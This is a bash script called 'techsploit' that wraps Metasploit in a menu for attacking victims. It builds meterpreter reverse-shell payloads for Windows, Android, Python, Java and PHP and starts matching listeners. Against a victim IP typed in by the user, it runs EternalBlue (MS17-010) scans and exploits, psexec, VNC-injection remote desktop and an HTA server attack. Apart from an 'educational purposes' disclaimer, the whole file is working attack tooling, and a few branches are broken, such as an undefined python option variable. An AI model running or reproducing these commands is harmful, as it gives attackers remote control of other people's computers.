#!/bin/bash

# techsploit
i="0"
resize -s 27 80
clear
while [ $i -lt 1 ]
do
clear
ip=$(ip addr show wlan0 | awk '/inet / {print $2}' | cut -d/ -f 1)

 echo -e '\e[1;37m
      /$$                         /$$                           /$$           /$$   /$$    
  | $$                        | $$                          | $$          |__/  | $$    
 /$$$$$$    /$$$$$$   /$$$$$$$| $$$$$$$   /$$$$$$$  /$$$$$$ | $$  /$$$$$$  /$$ /$$$$$$  
|_  $$_/   /$$__  $$ /$$_____/| $$__  $$ /$$_____/ /$$__  $$| $$ /$$__  $$| $$|_  $$_/  
  | $$    | $$$$$$$$| $$      | $$  \ $$|  $$$$$$ | $$  \ $$| $$| $$  \ $$| $$  | $$    
  | $$ /$$| $$_____/| $$      | $$  | $$ \____  $$| $$  | $$| $$| $$  | $$| $$  | $$ /$$
  |  $$$$/|  $$$$$$$|  $$$$$$$| $$  | $$ /$$$$$$$/| $$$$$$$/| $$|  $$$$$$/| $$  |  $$$$/
   \___/   \_______/ \_______/|__/  |__/|_______/ | $$____/ |__/ \______/ |__/   \___/  
                                                  | $$                                  
                                                  | $$                                  
                                                  |__/         
                                Created by "TECHSKING"
                                https://www.youtube.com/c/techsking\e[0m \e[1;31m

 Usage of techsploit for attacking targets without prior mutual consent is
 ILLEGAL. Developers are not responsible for any damage caused by this script.
 techsploit is intented ONLY FOR EDUCATIONAL PURPOSES!!! STAY LEGAL!!!
\e[1;33m
(1) Windows --> test.exe (payload and listener) 
(2) Android --> test.apk (payload and listener)  
'
 
 
 
 
 
 
service postgresql start
exe='1'
apk='2'
jar='4' 
php='5'
scan='6'
eternalblue='7'
eternalbluerd='7rd'
psexec='8'
psexecrd='8rd'
hta='9'
me='10'




read x

if [ "$x" == "$exe" ]; then                    #EXE
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.8 lport=4444 -f exe > /root/Desktop/test.exe
echo -e '

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!Your payload: /root/Desktop/test.exe!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Waiting for listener...
 
'

msfconsole -q -x " use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;  set lhost 192.168.0.8 ; set lport 4444 ; exploit ;"


elif [ "$x" == "$apk" ]; then                          #APK
msfvenom -p android/meterpreter/reverse_tcp lhost=$ip lport=4444 > /root/Desktop/test.apk
echo -e '

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!Your payload: /root/Desktop/test.apk!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Waiting for listener...
 
'

msfconsole -q -x " use exploit/multi/handler; set payload android/meterpreter/reverse_tcp;  set lhost $ip ; set lport 4444 ; exploit ;"




elif [ "$x" == "$py" ]; then                       #PYTHON
msfvenom -p python/meterpreter/reverse_tcp lhost=$ip lport=4444 > /root/Desktop/test.py
echo -e '

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!Your payload: /root/Desktop/test.py!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Waiting for listener...
 
'

msfconsole -q -x " use exploit/multi/handler; set payload python/meterpreter/reverse_tcp;  set lhost $ip ; set lport 4444 ; exploit ;"



elif [ "$x" == "$jar" ]; then                        #JAVA
msfvenom -p java/meterpreter/reverse_tcp lhost=$ip lport=4444 -f jar > /root/Desktop/test.jar
echo -e '

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!Your payload: /root/Desktop/test.jar!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Waiting for listener...
 
'

msfconsole -q -x " use exploit/multi/handler; set payload java/meterpreter/reverse_tcp;  set lhost $ip ; set lport 4444 ; exploit ;"






elif [ "$x" == "$php" ]; then                        #PHP
msfvenom -p php/meterpreter/reverse_tcp lhost=$ip lport=4444 > /root/Desktop/test.php
echo -e '

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!Your payload: /root/Desktop/test.php!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Waiting for listener...
 
'

msfconsole -q -x " use exploit/multi/handler; set payload php/meterpreter/reverse_tcp;  set lhost $ip ; set lport 4444 ; exploit ;"




elif [ "$x" == "$scan" ]; then                        #SCAN
echo "Victim's IP:"
read r

msfconsole -q -x " use auxiliary/scanner/smb/smb_ms17_010; set rhosts $r ; exploit ;exit ;"
echo ' '
echo '           Press ENTER to Main Menu '
echo ' '
read


elif [ "$x" == "$eternalblue" ]; then                        #ETERNALBLUE
echo "Victim's IP:"
read r

msfconsole -q -x " use exploit/windows/smb/ms17_010_eternalblue; set payload windows/x64/meterpreter/reverse_tcp;  set lhost $ip ; set rhost $r ; exploit ; "



elif [ "$x" == "$eternalbluerd" ]; then                        #ETERNALBLUERD
echo "Victim's IP:"
read r

msfconsole -q -x " use exploit/windows/smb/ms17_010_eternalblue; set payload windows/x64/vncinject/reverse_tcp;  set lhost $ip ; set rhost $r ; set viewonly false ; exploit ; "




elif [ "$x" == "$psexec" ]; then                        #PSEXEC
echo "Victim's IP:" 
read r

msfconsole -q -x " use exploit/windows/smb/ms17_010_psexec; set lhost $ip ; set rhost $r ; exploit ;"


elif [ "$x" == "$psexecrd" ]; then                        #PSEXECRD
echo "Victim's IP:"
read r

msfconsole -q -x " use exploit/windows/smb/ms17_010_psexec; set payload windows/vncinject/reverse_tcp;  set lhost $ip ; set rhost $r ; set viewonly false ; exploit ; "



elif [ "$x" == "$hta" ]; then                        #HTA
echo 'Uripath: (/)'
read u
msfconsole -q -x " use exploit/windows/misc/hta_server; set srvhost $ip; set uripath /$u; set payload windows/meterpreter/reverse_tcp; set lhost $ip ; exploit ;"



elif [ "$x" == "$me" ]; then                 #CONTACT WITH ME                      

clear

echo -e '\e[1;37m

  /$$                         /$$                           /$$           /$$   /$$    
  | $$                        | $$                          | $$          |__/  | $$    
 /$$$$$$    /$$$$$$   /$$$$$$$| $$$$$$$   /$$$$$$$  /$$$$$$ | $$  /$$$$$$  /$$ /$$$$$$  
|_  $$_/   /$$__  $$ /$$_____/| $$__  $$ /$$_____/ /$$__  $$| $$ /$$__  $$| $$|_  $$_/  
  | $$    | $$$$$$$$| $$      | $$  \ $$|  $$$$$$ | $$  \ $$| $$| $$  \ $$| $$  | $$    
  | $$ /$$| $$_____/| $$      | $$  | $$ \____  $$| $$  | $$| $$| $$  | $$| $$  | $$ /$$
  |  $$$$/|  $$$$$$$|  $$$$$$$| $$  | $$ /$$$$$$$/| $$$$$$$/| $$|  $$$$$$/| $$  |  $$$$/
   \___/   \_______/ \_______/|__/  |__/|_______/ | $$____/ |__/ \______/ |__/   \___/  
                                                  | $$                                  
                                                  | $$                                  
                                                  |__/    v1.0 \e[0m


 \e[1;31m
 THANK YOU !!! SUBSCRIBE & LIKE


                          Press ENTER to Main Menu
'
read


else 

n


fi

done



